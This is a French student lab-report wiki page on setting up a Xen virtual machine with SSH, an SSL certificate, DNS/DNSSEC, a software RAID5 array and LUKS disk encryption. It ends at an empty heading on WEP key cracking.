===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
